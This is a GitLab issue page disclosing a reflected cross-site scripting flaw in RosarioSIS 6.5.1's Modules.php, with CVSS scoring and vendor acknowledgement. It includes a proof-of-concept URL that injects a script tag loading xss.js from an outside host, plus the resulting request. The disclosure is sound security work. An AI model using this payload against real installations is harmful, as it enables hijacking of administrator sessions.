Skip to content
GitLab
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    • Switch to GitLab Next
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • rosariosis rosariosis
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 15
    • Issues 15
    • List
    • Boards
    • Service Desk
    • Milestones
    • Requirements
  • Merge requests 0
    • Merge requests 0
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Wiki
    • Wiki
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • François Jacquet
  • rosariosisrosariosis
  • Issues
  • #282
Closed
Open
Issue created Jun 08, 2020 by M507@M507🔧

Reflected Cross-Site Scripting vulnerability

Cross-Site Scripting vulnerability in RosarioSIS Student Information System allows remote attackers to execute arbitrary web script. The exploitation of this issue can lead to admin session hijacking or executing arbitrary requests using the admin's session.

Plugin README
Vulnerability type: Cross-Site Scripting vulnerability (XSS)
Vendor of the product(s): RosarioSIS
Affected product(s)/code base: Tested on version 6.5.1
Has vendor confirmed or acknowledged the vulnerability: Yes
Attack type: Reflected XSS
Impact & Description: C:L/I:L/A:N
Affected component: Modules.php
Attack vector(s): Remote
Proof of concept (PoC): Details below
Reference(s): https://github.com/francoisjacquet/rosariosis/issues/260
CVSS v3.1 details: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Notes:

# PoC
http://RosarioSIS.edu/Modules.php?modname=School_Setup/Rollover.php&%22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E=1
# vuln.com gets this requests for xss.js
GET /xss.js HTTP/1.1
Host: RosarioSIS.edu
User-Agent: Mozilla/5.0 (Win)
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://RosarioSIS.edu/Modules.php?modname=School_Setup/Rollover.php&%22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E=1
To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information
Assignee
Assign to
Time tracking